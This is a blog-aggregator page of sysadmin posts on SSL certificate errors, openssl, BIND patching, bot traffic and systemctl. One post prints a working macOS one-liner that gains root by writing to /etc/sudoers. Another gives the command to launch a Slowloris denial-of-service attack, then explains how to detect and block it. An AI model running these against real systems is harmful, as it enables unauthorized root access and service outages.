The upper left corner shows you the signal strength expressed in dots. It's a simple scale from 1 to 5. But like any technically savvy person can tell you, in reality there are many more stages of cell reception.

Your iPhone has a way of exposing that data for you, if you know how.

Start by dialling a special number: *3001#12345#*. The number includes the hashes and asterisks.


Hit dial and watch the field test pop up. You'll immediately notice that the upper left corner stopped showing dots and started to show an actual number: the cell reception, expressed in dB.

The higher the number (the closer to zero), the better your signal: -51 is a full signal, while -105 is practically no signal. Anything in between is average. For more details on how cell reception works, I kindly refer you to Wikipedia.


If you tap the upper left corner, you can toggle between dots and dB view.

In the popup menu you've got some more debug info too; it's pretty fun to poke around and see some of the internals of your cell reception --- data that's usually kept hidden.


To quit, just hit the home button and everything will return to normal. To my knowledge, there's no way to keep the dB view enabled full-time; it only shows in the debug screen.

The post iPhone’s “Field Test” debug screen: Dial *3001#12345#* for the real signal strength appeared first on

by Mattias Geniar at August 13, 2015 07:48 PM

Nginx SSL Certificate Errors: PEM_read_bio_X509_AUX, PEM_read_bio_X509, SSL_CTX_use_PrivateKey_file

The post Nginx SSL Certificate Errors: PEM_read_bio_X509_AUX, PEM_read_bio_X509, SSL_CTX_use_PrivateKey_file appeared first on

When configuring your SSL certificates on Nginx, it's not uncommon to see several errors when you try to reload your Nginx configuration, to activate the SSL Certificates.

This post describes the following type of errors:

Read on for more details.

Nginx PEM_read_bio_X509: ASN1_CHECK_TLEN:wrong tag error

These kinds of errors pop up when your certificate file isn't valid. The entire error looks like this.

$ service nginx restart

nginx: [emerg] PEM_read_bio_X509("/etc/nginx/ssl/mydomain.tld/certificate.crt") failed (SSL: error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error:Type=X509_CINF error:0D08303A:asn1 encoding routines:ASN1_TEMPLATE_NOEXP_D2I:nested asn1 error:Field=cert_info, Type=X509 error:0906700D:PEM routines:PEM_ASN1_read_bio:ASN1 lib)

Start debugging by reading the SSL certificate info via the CLI. Chances are, OpenSSL will also show you an error, confirming your SSL certificate isn't valid.

In the example above, the SSL certificate is in /etc/nginx/ssl/mydomain.tld/certificate.crt, so the following examples continue to use that file.

$ openssl x509 -text -noout -in /etc/nginx/ssl/mydomain.tld/certificate.crt
unable to load certificate
139894337988424:error:0906D064:PEM routines:PEM_read_bio:bad base64 decode:pem_lib.c:818:

If that's your output, you have confirmation: your SSL certificate is corrupt. It's got unsupported ASCII characters, it's missing a part, some copy/paste error caused extra data to be present, ... Bottom line: your certificate file won't work.

You can test a few things yourself, like new line issues (Linux vs. Windows remains a problem). Open the file in binary mode in vi, and if you see ^M at the end of every line, you've incorrectly got Windows new lines instead of Unix new lines.

$ vi -b /etc/nginx/ssl/mydomain.tld/certificate.crt

Replace the Windows line endings with "normal" Unix new lines (\n instead of \r\n).
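If the file does turn out to have Windows line endings, stripping the carriage returns is a one-liner. A small sketch (the demo file here is a stand-in for your real certificate):

```shell
# Create a file with Windows (\r\n) line endings to demonstrate:
printf -- '-----BEGIN CERTIFICATE-----\r\nMIIF...\r\n-----END CERTIFICATE-----\r\n' > /tmp/cert-crlf.crt

# Strip the carriage returns, leaving plain Unix (\n) line endings:
tr -d '\r' < /tmp/cert-crlf.crt > /tmp/cert-unix.crt

# This prints 0 and a confirmation if the file is clean:
grep -c $'\r' /tmp/cert-unix.crt || echo "no CR characters left"
```

The same result can be had with dos2unix, if it's installed.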

If your SSL certificate file contains multiple certificates, like intermediate or CA root certificates, it's important to check each of them separately. You can check this by counting the "-----BEGIN CERTIFICATE-----" lines in the file.

If you've got multiple certificates, copy/paste each one to a different file and run the openssl example above. Each should give you valid output from the SSL certificate.

$ grep 'BEGIN CERTIFICATE' /etc/nginx/ssl/mydomain.tld/certificate.crt
-----BEGIN CERTIFICATE-----
-----BEGIN CERTIFICATE-----
-----BEGIN CERTIFICATE-----

The output above shows that the SSL Certificate file contains 3 individual SSL certificates. Copy/paste them all into separate files and validate that each works. If one of them gives you errors, fix that one: find the wrong ASCII characters, fix the new lines, check if you copy/pasted it correctly from your vendor, ...
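Instead of copy/pasting by hand, you can split the bundle on the BEGIN markers with a small awk one-liner. A sketch (the dummy bundle below stands in for your real certificate.crt):

```shell
# Build a dummy bundle with three certificate blocks to demonstrate:
for i in 1 2 3; do
  printf -- '-----BEGIN CERTIFICATE-----\ndummy-%s\n-----END CERTIFICATE-----\n' "$i"
done > /tmp/bundle.crt

# Write each certificate block to its own file: /tmp/cert-1.pem, /tmp/cert-2.pem, ...
awk '/-----BEGIN CERTIFICATE-----/{n++} n{print > ("/tmp/cert-" n ".pem")}' /tmp/bundle.crt

ls /tmp/cert-*.pem
```

Each split file can then be fed to the openssl x509 command above to find the broken one.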

The "nginx: [emerg] PEM_read_bio_X509" error means your Nginx configuration is probably correct; it's the SSL certificate file itself that is invalid.

Nginx PEM_read_bio_X509_AUX: Expecting: TRUSTED CERTIFICATE

This is an error that is usually resolved very quickly. The certificate file you're pointing your config to isn't a certificate file. At least, not according to Nginx.

$ service nginx configtest

nginx: [emerg] PEM_read_bio_X509_AUX("/etc/nginx/ssl/mydomain.tld/certificate.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line:Expecting: TRUSTED CERTIFICATE)
nginx: configuration file /etc/nginx/nginx.conf test failed

This can happen if you've accidentally swapped your private key and SSL certificate in either your files, or in the Nginx configuration.

Your Nginx config will contain these kind of lines for its SSL configuration.

ssl_certificate             /etc/nginx/ssl/mydomain.tld/certificate.crt;
ssl_certificate_key         /etc/nginx/ssl/mydomain.tld/certificate.key;

Check if the ssl_certificate file is indeed your SSL certificate and if the ssl_certificate_key is indeed your key. It's not uncommon to mix these up if you're in a hurry or distracted and save the wrong contents to the wrong file.

Nginx SSL_CTX_use_PrivateKey_file: bad base64 decode error

Another common error in Nginx configurations is the following one.

$ service nginx configtest

nginx: [emerg] SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/mydomain.tld/certificate.key") failed (SSL: error:0906D064:PEM routines:PEM_read_bio:bad base64 decode error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib)
nginx: configuration file /etc/nginx/nginx.conf test failed

Note how the Nginx SSL error points to the .key file this time. The problem is with the SSL key, not the SSL certificate.

This error indicates that the private key you pointed your configuration to doesn't match the SSL certificate.

You can validate whether private key and SSL certificate match by calculating their MD5 hash. If they don't match, you have to find either the right certificate or the right private key file.

One of them is wrong and needs to be replaced. With this error, it's impossible to know which one is wrong. Your best bet is to read the info from the SSL certificate, determine if that's the correct SSL certificate (check expiration date, SANs, Common Name, ...), and find the matching key (which should have been created when you generated your Certificate Signing Request, CSR).
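The MD5-modulus comparison mentioned above can be sketched like this (the self-signed pair generated here is a throwaway stand-in for your real certificate.crt and certificate.key):

```shell
# Generate a throwaway self-signed certificate + key pair (demo only):
openssl req -x509 -newkey rsa:2048 -nodes -subj "/CN=mydomain.tld" \
  -keyout /tmp/demo.key -out /tmp/demo.crt -days 1 2>/dev/null

# A certificate and key match when their RSA moduli are identical;
# hashing the moduli with MD5 makes the comparison easy on the eye.
cert_md5=$(openssl x509 -noout -modulus -in /tmp/demo.crt | openssl md5)
key_md5=$(openssl rsa -noout -modulus -in /tmp/demo.key | openssl md5)

[ "$cert_md5" = "$key_md5" ] && echo "certificate and key match" || echo "MISMATCH: wrong key or certificate"
```

Run the same two openssl commands against your real files; if the hashes differ, you've found the culprit.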

The post Nginx SSL Certificate Errors: PEM_read_bio_X509_AUX, PEM_read_bio_X509, SSL_CTX_use_PrivateKey_file appeared first on

by Mattias Geniar at August 13, 2015 07:28 PM

The Hidden “Refresh” Menu in Chrome when Developer Tools Are Opened

The post The Hidden “Refresh” Menu in Chrome when Developer Tools Are Opened appeared first on

Aah, the things Reddit can teach you.

Turns out, if you have your Developer Tools open ("inspect element" on a page), there's a hidden right-click menu on the refresh button in Chrome.


It's probably not that useful, since you can just check the Disable cache option in the Network tab when you have the inspector open and get the same effect when you refresh the page.


But hey, as an ex-gamer, I appreciate easter eggs like these.

The post The Hidden “Refresh” Menu in Chrome when Developer Tools Are Opened appeared first on

by Mattias Geniar at August 13, 2015 03:31 PM

August 12, 2015

Mattias Geniar

Apple’s DYLD_PRINT_TO_FILE vulnerability: from zero to root in 2 seconds

The post Apple’s DYLD_PRINT_TO_FILE vulnerability: from zero to root in 2 seconds appeared first on

Several weeks ago, a vulnerability in Apple's logging implementation was discovered by Stefan Esser (known for jailbreaks of iOS devices). To this day, the vulnerability remains unpatched.

It's trivially simple to get a root account once you have a normal user account on an OS X system.

By default, sudo is protected by your account password.

$ sudo su -

However, if you abuse the DYLD_PRINT_TO_FILE vulnerability, you instantly get root.

$ id

$ DYLD_PRINT_TO_FILE=/etc/sudoers newgrp <<< 'echo "$USER ALL=(ALL) NOPASSWD:ALL" >&3'; sudo -s

$ id
uid=0(root) gid=0(wheel)

A single one-liner that elevates your privileges and bypasses sudo altogether.

It's one thing that this happened. It's software, we expect bugs. It's quite another that this problem still isn't patched after weeks of the exploit being known in the wild.

The post Apple’s DYLD_PRINT_TO_FILE vulnerability: from zero to root in 2 seconds appeared first on

by Mattias Geniar at August 12, 2015 07:28 PM

Frank Goossens

The broken smartphone sequel

It's been almost a year since I last listed all the smartphones that passed through my clumsy hands, so surely I must have some items to add to that list, you might think? Indeed! So starting off where we ended last year;

  1. 2014: Google Galaxy Nexus; 2nd hand replacement (a steal for only €95) with Cyanogenmod 11. Missed 4G, but loved the phone really. It just died on me within a week.
  2. 2014: ZTE Vec Blade 4G: no 2nd hand, 4G and not ridiculously expensive was what I was aiming for, so I bought the ZTE for just €170 and it was a very decent handset really. I sent it in for repairs under warranty mid 2015 after the power-button broke.
  3. 2015: Samsung Galaxy Ace2: much like the Galaxy Gio I used before, a usable but underpowered small smartphone with an aging 2.x Android. But once one is used to it, there’s not a lot one cannot do with it (I typically want Firefox Mobile, WordFeud and a music player).
  4. 2015: back to the ZTE which was repaired perfectly, until after approx. a month it fell out of my pocket onto the ground, shattering the glass. I tried finding a shop to replace the glass, but ZTE being not that common I didn’t find one. So …
  5. 2015: Samsung Galaxy Core Prime VE: So I wanted a not-too-expensive big-brand phone (i.e. LG, Sony, Samsung or HTC) to have a better chance of getting it repaired outside of warranty, with 4G and a very recent Android-version (i.e. Lollipop) and that’s what the Galaxy Core Prime is about. I added a 16Gb class 10 SD-card and I bought a flip wallet case. Just to be safe I’ll go and buy a screen protector as well, because I am, as this list proves, not only spoiled but also clumsy.

by frank at August 12, 2015 03:22 PM

August 11, 2015

Mattias Geniar

Bind/Named Crash: REQUIRE(*name == ((void *)0)) failed, CVE-2015-5477

The post Bind/Named Crash: REQUIRE(*name == ((void *)0)) failed, CVE-2015-5477 appeared first on

A couple of weeks ago, a major bind (named) vulnerability was exposed. The denial-of-service vulnerability abused a flaw in the way TKEY DNS records were processed.

The TKEY vulnerability

A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)
Red Hat: CVE-2015-5477

Detecting CVE-2015-5477 in the wild

If you have bind nameservers running, you may see the following kind of logs appear in your syslog messages.

Aug  11 01:22:16 $server named[$pid]: message.c:2231: REQUIRE(*name == ((void *)0)) failed
Aug  11 01:22:16 $server named[$pid]: exiting (due to assertion failure)

And as a result, your bind nameserver will be dead.

$ service named status
named dead but subsys locked

Someone just sent a rogue TKEY packet to your server with the sole intent of crashing it.
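A quick way to check whether this is what killed your named is to count the assertion-failure signatures in your syslog. A sketch (the demo log below stands in for your real /var/log/messages):

```shell
# A stand-in syslog excerpt to demonstrate:
cat > /tmp/messages <<'EOF'
Aug 11 01:22:16 server named[1234]: message.c:2231: REQUIRE(*name == ((void *)0)) failed
Aug 11 01:22:16 server named[1234]: exiting (due to assertion failure)
EOF

# Anything > 0 means named exited this way at least once:
grep -c 'exiting (due to assertion failure)' /tmp/messages
```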

Patching CVE-2015-5477

Patching is trivial by now. That's the advantage of being late to the party: all major OS vendors have had their official packages updated.

On RHEL/CentOS:

$ yum update bind
$ service named restart

On Debian/Ubuntu:

$ apt-get install bind9
$ service bind9 restart

And you're patched against CVE-2015-5477.

The post Bind/Named Crash: REQUIRE(*name == ((void *)0)) failed, CVE-2015-5477 appeared first on

by Mattias Geniar at August 11, 2015 04:12 AM

August 10, 2015

Mattias Geniar

How To Read The SSL Certificate Info From the CLI

The post How To Read The SSL Certificate Info From the CLI appeared first on

This guide will show you how to read the SSL Certificate Information from a text-file on your server or from a remote server by connecting to it with the OpenSSL client.

Read the SSL Certificate information from a text-file at the CLI

If you have your certificate file available to you on the server, you can read the contents with the openssl client tools.

By default, your certificate will look like this.

$ cat certificate.crt
-----BEGIN CERTIFICATE-----
MIIF...
(a long base64-encoded blob)
-----END CERTIFICATE-----

Which doesn't really tell you much.

However, you can decode that certificate into a more readable form with the openssl tool.

$ openssl x509 -text -noout -in certificate.crt 

It will display the SSL certificate details, like the expiration date, common name, issuer, ...

Here's what it looks like for my own certificate.

$ openssl x509 -text -noout -in certificate.crt 

    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=BE, O=GlobalSign nv-sa, CN=AlphaSSL CA - SHA256 - G2
            Not Before: Dec 16 20:01:40 2014 GMT
            Not After : Dec 16 20:01:40 2017 GMT
        Subject: C=BE, OU=Domain Control Validated,
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)

The openssl tools are a must-have when working with certificates on your Linux server.

Read the SSL Certificate information from a remote server

You may want to monitor the validity of an SSL certificate from a remote server, without having the certificate.crt text file locally on your server? You can use the same openssl for that.

To connect to a remote host and retrieve the public key of the SSL certificate, use the following command.

$ openssl s_client -showcerts -connect mydomain.tld:443

This will connect to the host on port 443 and show the certificate. Its output looks like this.

$ openssl s_client -showcerts -connect mydomain.tld:443

Server certificate
subject=/C=BE/OU=Domain Control Validated/
issuer=/C=BE/O=GlobalSign nv-sa/CN=AlphaSSL CA - SHA256 - G2

There's a lot more output, like the intermediate CA certificates, the raw (encoded) certificates and more information on the ciphers used to negotiate with the remote server.

You can use it to find the expiration date, to test for SSL connection errors, ...
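For scripting, the -enddate flag prints just the expiry. A sketch using a locally generated, throwaway certificate, so it works without network access:

```shell
# Generate a throwaway certificate to demonstrate (demo only):
openssl req -x509 -newkey rsa:2048 -nodes -subj "/CN=mydomain.tld" \
  -keyout /tmp/exp.key -out /tmp/exp.crt -days 30 2>/dev/null

# Print only the expiry date and subject:
openssl x509 -noout -enddate -subject -in /tmp/exp.crt
```

Against a live host, the same extraction works by piping: echo | openssl s_client -connect mydomain.tld:443 2>/dev/null | openssl x509 -noout -enddate.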

The post How To Read The SSL Certificate Info From the CLI appeared first on

by Mattias Geniar at August 10, 2015 07:16 PM

Frank Goossens

Music from Our Tube; Gregory Porter’s musical roots

If you like Gregory Porter (and everybody seems to, with that "Liquid Spirit" remix that gets huge airplay on all radio stations here in Belgium), you'll absolutely love this;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Sixties socially engaged soul-jazz, written by Gene McDaniels (do watch & listen to him discussing the origins of the song) and performed by Les McCann & Eddie Harris at the Montreux Jazz Festival, released on the album "Swiss Movement". And guess which album Gregory Porter would take with him to a desert island?

by frank at August 10, 2015 05:21 AM

August 09, 2015

Mattias Geniar

What happens to a new URL the first 10 minutes on the internet?

The post What happens to a new URL the first 10 minutes on the internet? appeared first on

If a URL is never indexed, and no one visits it, does it even exist?

These kind of existential nerd-questions make you wonder about virgin URLs. Do they even exist, URLs that have never been visited? And as a result, what exactly happens if you hit publish on your blog and send your freshly written words out onto the World Wide Web?

I'll dive deeper into the access logs and find out what happens in the first 10 minutes when a new URL is introduced onto the web.

Disclaimer: testing with a WordPress website

I'm testing with my own website, which is WordPress based. WordPress is pretty smart when it comes to publishing new posts: it pings the right search engines and social networks (if enabled) and lets the world know you have written new content.

If you're writing this on a static site generator or just plain ol' HTML, your mileage may vary.

These tests were conducted without any social network pinging, I did leave the default "Update Services" list enabled. And as it turns out, that's a pretty damn long list.

The first 5 hits

You'll probably see these couple of hits as the first ones in your access logs:

  1. Your own: don't deny it, you're reading your blogpost again. Still doubting if you should have hit Publish after all.
  2. Tiny Tiny RSS hits: this self-hosted RSS reader is crazy popular. Chances are, you'll see quite a few of these hits, since every self-hosted TT-RSS does its own fetching.
  3. Crazy requests from OVH: this French hosting provider has a lot of servers. I can't tell why these hits even come, but they're masquerading as legit users with "valid" User-Agents. Pretty sure these are crawlers for some service, but haven't figured out which one.
  4. GoogleBot: within 10 minutes, Google will have come by and has indexed your newly written page.
  5. Feedburner & other RSS aggregators: since these all run automated, they are naturally among your first visitors. Every RSS service that's subscribed to your feed will come crawling by. Most of the popular ones have received a ping from WordPress to notify them that new content has been published.

The requests look like this.

$ tail -f access.log

You: "GET /your-url/ HTTP/1.1" 200 11395 "-" "Mozilla/5.0"

Tiny Tiny RSS feeds: "GET /your-url/ HTTP/1.1" 200 11250 "-" "Tiny Tiny RSS ("

Feedburner: "GET /your-url/?utm_source=feedburner&utm_medium=feed HTTP/1.1" 206 11250 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)"

GoogleBot "GET /your-url/ HTTP/1.1" 200 11250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +"

The first few hits aren't really special. The extravaganza comes in the next part.

Google is crazy fast

Considering the volume of data they process on a daily basis and the amount of search queries they get per second, it's hard to imagine there's room to index more.

After a single minute, the blogpost shows up as part of the Google+ social network search results.


And within 20 minutes, Google's "normal" search results have the page completely indexed.


This just blows my mind.

Social Sharing: Bot Heaven

You want to drive traffic to your new blog post, so you share it on your Facebook. And your Twitter. And LinkedIn. And Google+.

As soon as you share your new URL on social media, your server receives multiple HTTP requests in order to create a description, title and cover image for that social network.


Each of those services fetches your URL, which means at least one HTTP call to get your content. Probably more, as they continue to fetch images, stylesheets, check your robots.txt, ...

  1. "Mozilla/5.0 (compatible; redditbot/1.0; +": the Reddit Bot, fetching an image + title suggestions.
  2. "Mozilla/5.0 (TweetmemeBot/4.0; +": yet another Twitter bot.
  3. "Twitterbot/1.0″: the actual twitter bot, used to create the Twitter Cards.
  4. "(Applebot/0.1; +": the Siri & Spotlight searchbot, soon to power the News App on IOS 9.
  5. "Google (+": Google's snippet generator for services like Google+.
  6. "facebookexternalhit/1.1 (+": Facebook fetching your URL to generate a preview in the News Feed.
  7. "Googlebot-Image/1.0": if your post contained images, this little bot just came by to index them. It's a separate request from the Googlebot that came by earlier.

Besides those well-known bots, you'll see a flurry of bots you've never heard of or thought were extinct: Zemanta Aggregator, BingBot, Slackbot-LinkExpanding, MetaDataParser, BazQux, Apache-HttpClient (Java implementations of HTTP fetchers), Ahrefs Bot, BrandWatch bot, Baiduspider, MJ12bot, YandexBot, FlipboardProxy, Lynx/Curl (for monitoring), ...

It's a bot party and everyone's invited!

Within 10 minutes, I had a total of 33 bots visit the new URL. Most of these I have never heard of.
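If you want to run the same count on your own site, you can tally the user-agents in an access log in the common combined format. A sketch with a stand-in log file (point the awk at your real access.log instead):

```shell
# A few fake combined-format log lines to demonstrate:
cat > /tmp/access.log <<'EOF'
1.2.3.4 - - [09/Aug/2015:20:00:01 +0200] "GET /your-url/ HTTP/1.1" 200 11250 "-" "Googlebot/2.1"
5.6.7.8 - - [09/Aug/2015:20:00:05 +0200] "GET /your-url/ HTTP/1.1" 200 11250 "-" "Twitterbot/1.0"
9.9.9.9 - - [09/Aug/2015:20:00:09 +0200] "GET /your-url/ HTTP/1.1" 200 11250 "-" "Googlebot/2.1"
EOF

# The user-agent is the 6th double-quoted field; count each distinct one:
awk -F'"' '{print $6}' /tmp/access.log | sort | uniq -c | sort -rn
```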

There's No Such Thing As a Virgin URL

Checking my own access logs, I don't believe there are URLs that have never been visited.

They may not have been visited by real humans, but they've been indexed at least a dozen times. By services you don't know. That treat your data in ways you don't want to know.

It seems strange to have all these kinds of services do their own indexing. Imagine the overhead and waste of bandwidth, CPU cycles and disk space each of these bots is consuming. Since most of them offer competing services, they'll never work together and join forces.

The amount of bot crawling will only increase. On small to medium sized sites, the amount of bot crawling can exceed the regular visitors by a factor of 3x or 4x.

That means if Google Analytics is showing you an average of 1.000 pageviews a day, you can safely assume your server is handling 3.000 to 4.000 pageviews, just to serve the bots, RSS aggregators and link fetchers.

It's a crazy world we live in.

The post What happens to a new URL the first 10 minutes on the internet? appeared first on

by Mattias Geniar at August 09, 2015 07:57 PM

Block User-Agent in htaccess for Apache Webserver

The post Block User-Agent in htaccess for Apache Webserver appeared first on

This guide will show you how to block requests to your site if they come with a certain User-Agent. This can be very useful to fend of a WordPress pingback DDoS attack or block other unwanted requests.

Assuming .htaccess is already enabled on your server (it is on most servers running Apache), add the following near the very top to block this user-agent from accessing your site.

$ cat .htaccess
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{HTTP_USER_AGENT} ^WordPress [NC]
  RewriteRule .* - [F,L]
</IfModule>

The example above will block any request that has a User-Agent that starts with (the ^ regex modifier) "WordPress". I used this particular example to defend against a WordPress pingback attack, where old versions of WordPress are tricked into attacking a single target.

If you want to block multiple User-Agents in htaccess, you can combine them into a single line like this.

$ cat .htaccess
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{HTTP_USER_AGENT} ^(WordPress|ApacheBench) [NC]
  RewriteRule .* - [F,L]
</IfModule>

The example above blocks all requests with a User-Agent that starts with WordPress or ApacheBench.
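The matching semantics can be sanity-checked outside Apache: the [NC] flag corresponds to case-insensitive matching and ^ anchors the pattern at the start of the string. A quick sketch using grep's extended regexes to mimic the RewriteCond:

```shell
# Mimic the rewrite condition: case-insensitive (like [NC]), anchored (^).
check() {
  printf '%s' "$1" | grep -Eqi '^(wordpress|apachebench)' \
    && echo "blocked: $1" \
    || echo "allowed: $1"
}

check "WordPress/4.2; http://victim.example/"    # starts with WordPress -> blocked
check "apachebench/2.3"                          # case doesn't matter -> blocked
check "Mozilla/5.0 (compatible; Googlebot/2.1)"  # doesn't start with either -> allowed
```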

Alternatively, you can use a SetEnvIfNoCase block, which sets an environment variable if the condition described is met. This can be useful if, for some reason, mod_rewrite isn't available.

$ cat .htaccess
<IfModule mod_setenvif.c>
  SetEnvIfNoCase User-Agent (sqlmap|wordpress|apachebench) bad_user_agents

  Order Allow,Deny
  Allow from all
  Deny from env=bad_user_agents
</IfModule>

The example above will deny access to everyone that has a User-Agent that has either SQLMap, WordPress or ApacheBench in the string. It's case insensitive and the User-Agent does not have to start with that string, because it lacks the ^ modifier.

The post Block User-Agent in htaccess for Apache Webserver appeared first on

by Mattias Geniar at August 09, 2015 07:00 PM

Philip Van Hoof

I've done my bit once again

I youtubed this last night when my diving club had come over to burn meat on a grill over glowing coals. Oh, and we had a good laugh with Hans Teeuwen and Theo Maassen too. After an hour of Geubels I figured we should show the world some other comedians as well. Divers are a cheerful bunch. A bit like us, nerds. I recommend all other computer guys take up diving too. Great people.

This isn't the first time I've blogged this video. But I'd like to run into more Astronomers, so that maybe we can actually buy up this planet here. And then build a gigantic spaceship. Together! Brand new world order 2.0. Or, shut the fuck up.

Just now I discussed a good idea with the one who stayed over to crash here. Someday I want to put a swimming pool here in Rillaar. Maybe I should build one in the shape of a saucer? Then the divers could come practice at my place.

by admin at August 09, 2015 10:34 AM

August 08, 2015

Mattias Geniar

Effectively Using and Detecting The Slowloris HTTP DoS Tool

The post Effectively Using and Detecting The Slowloris HTTP DoS Tool appeared first on

I first mentioned Slowloris on this blog in 2009, more than 6 years ago. To this day, it's still a very effective attack on Apache servers.

How it works

Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. It's a SYN flood in spirit, but one that completes the TCP handshake and is aimed directly at Apache's worker pool instead of the TCP stack.

This is particularly nasty, because it won't show up in your webserver logs until a request has finished, and it's the design of Slowloris to never finish requests and just keep them open.

You won't detect Slowloris in your logs; you have to use other tools to detect such an attack.

Starting a slowloris attack on Apache

Slowloris is a perl script, you can grab it from my mirrored github repo. Download the perl script and execute it.

$ ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 750

The above will connect to www.example.com on port 80 and attempt to make 750 connections to Apache and keep them open.

What it looks like on the server

To be on the receiving end of a Slowloris attack, you'll see the following.

If your apachectl status still works (it probably won't, because all your httpd processes will be busy), it will look like this.

$ apachectl status
   CPU Usage: u2.18 s.2 cu0 cs0 - .27% CPU load

   .817 requests/sec - 11.1 kB/second - 13.5 kB/request

   131 requests currently being processed, 2 idle workers


The symptoms are: very low CPU usage, a lot of Apache processes, very few new requests/s.

$ ps faux | grep httpd | wc -l

Slowloris works by making more and more requests, until it reaches your Apache's MaxClients limit.

In Apache 2.4, it looks like this.

$ tail -f /var/log/httpd/error.log
[mpm_prefork:error] [pid 7724] AH00161: server reached MaxRequestWorkers setting, consider raising the MaxRequestWorkers setting

For Apache 2.2, it looks like this.

$ tail -f /var/log/httpd/error.log
[error] server reached MaxClients setting, consider raising the MaxClients setting

The symptoms are always the same: MaxClients will be reached. It's how Slowloris prevents new connections from coming through.

What it looks like for a visitor of your site

Anyone trying to connect to your site will see a "connecting" spinner that keeps waiting forever.


The site won't load and your visitors will never get to see the content. If you have a webshop, you'll miss sales.

Identify the attacking IP address

You can detect the attack if you see such logs, but you don't know who started the attack: the source IP isn't logged until the HTTP requests are finished.

You can use netstat to list the most active IPs on your server. Slowloris may try to hide from the Apache service, but it can't hide from the network. Every request to Apache is still a connection to the server.

$ netstat -ntu -4 -6 |  awk '/^tcp/{ print $5 }' | sed -r 's/:[0-9]+$//' | sort | uniq -c | sort -n

The above will filter all IPs connected to your current server, order them and then count each unique occurrence. You'll find the most active IPs at the bottom.

If you're running an old version of netstat (like on CentOS 5.x), you may get an error like "netstat: invalid option -- 4". In that case, go for the following altered one-liner.

$ netstat -ntu |  awk '/^tcp/{ print $5 }' | sed -r 's/:[0-9]+$//' | sort | uniq -c | sort -n

The output looks like this.

$ netstat -ntu -4 -6 |  awk '/^tcp/{ print $5 }' | sed -r 's/:[0-9]+$//' | sort | uniq -c | sort -n
     40 186.2.xx.xx
    105 92.243.xx.xx

I had 105 connections from 92.243.xx.xx, which isn't normal for a webserver. Chances are, that's the one performing the Slowloris attack.

Blocking a Slowloris attack by blocking the IP

Once you've identified the IP, block it on your server. There are multiple ways to block an IP, like iptables, route, ip, ... I prefer the simple ip route add blackhole syntax.

$ ip route add blackhole 92.243.xx.xx

Restart your Apache server, to clear all connections, and you should be good -- until the attacker switches IP.

$ service httpd restart
$ systemctl restart httpd

All systems go.

Preventing Slowloris attacks

Slowloris abuses a fundamental design property of Apache's connection handling: every connection ties up a worker process or thread for as long as it stays open. There isn't much to do about that.

To effectively prevent Slowloris, your best bet is to enable some kind of proxy between the client and your Apache webserver. Tools like Varnish, Nginx or HAProxy are perfect for this. Their server design is different and can handle a lot more connections than Apache.

If you have to stick to Apache, you have a few options.

To limit connections to port :80 from a single IP, use the following iptables rule.

$ iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 50 --connlimit-mask 20 -j DROP

The --connlimit-above 50 will allow at most 50 connections. The --connlimit-mask 20 groups IPs using that prefix length. Every IP from the same /20 network is subject to that 50 connection limit.

Tune those numbers as you see fit, increase the connection limits or decrease the prefix.

by Mattias Geniar at August 08, 2015 07:39 PM

Start or Stop a Service on CentOS 7

This post will show you how to start or stop a service on a RHEL or CentOS 7 server.

Check the state of the service on CentOS 7

To check the state, run systemctl status on your target service.

$ systemctl status httpd
httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled)
   Active: active (running) since Fri 2015-07-31 22:26:29 CEST; 1 weeks 0 days ago
 Main PID: 27482 (httpd)
   Status: "Total requests: 0; Current requests/sec: 0; Current traffic:   0 B/sec"
   CGroup: /system.slice/httpd.service
           ├─ 1885 /usr/sbin/httpd -DFOREGROUND
           ├─ 1886 /usr/sbin/httpd -DFOREGROUND

There's quite a bit of output in systemctl, so let's break it down.

   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled)

The enabled/disabled at the end tells you if the service is enabled/disabled to start on boot.

   Active: active (running) since Fri 2015-07-31 22:26:29 CEST; 1 weeks 0 days ago

The Active: output tells you the state of the service. It's actively running and was started 1 week ago.

 Main PID: 27482 (httpd)

This one explains itself: the main PID is 27482. This is the Apache2 webserver, so we'll see many child processes with a parent PID referring to this main PID.

   Status: "Total requests: 0; Current requests/sec: 0; Current traffic:   0 B/sec"

The Status: output isn't available for every service. In the case of a webserver, it can show you throughput of the HTTP calls.

In the case of the MariaDB 10.0 service, it'll just show you the state of the service. Nothing more.

$ systemctl status mysql
mysql.service - LSB: start and stop MySQL
   Loaded: loaded (/etc/rc.d/init.d/mysql)
   Active: active (running) since Fri 2015-07-31 20:42:52 CEST; 1 weeks 1 days ago
   CGroup: /system.slice/mysql.service

The last part of the systemctl status output shows you the last lines of logs from that particular service.

Stop a service on CentOS 7

You stop a service with the systemctl stop command.

$ systemctl stop httpd

There's no additional output, but you can use systemctl status to verify the service has stopped.

$ systemctl status httpd
   Active: inactive (dead) since Sat 2015-08-08 20:53:23 CEST; 25s ago
  Process: 28234 ExecStop=/bin/kill -WINCH ${MAINPID} (code=exited, status=0/SUCCESS)
 Main PID: 27482 (code=exited, status=0/SUCCESS)

The service is "inactive (dead)" and was cleanly shut down ("code=exited, status=0/SUCCESS").

Alternatively, if you kill -9 a process, it'll show you that in the systemctl status output.

$ systemctl status httpd
  Process: 28465 ExecStart=/usr/sbin/httpd $OPTIONS -DFOREGROUND (code=killed, signal=KILL)
 Main PID: 28465 (code=killed, signal=KILL)

Useful output right there.

Start a service on CentOS 7

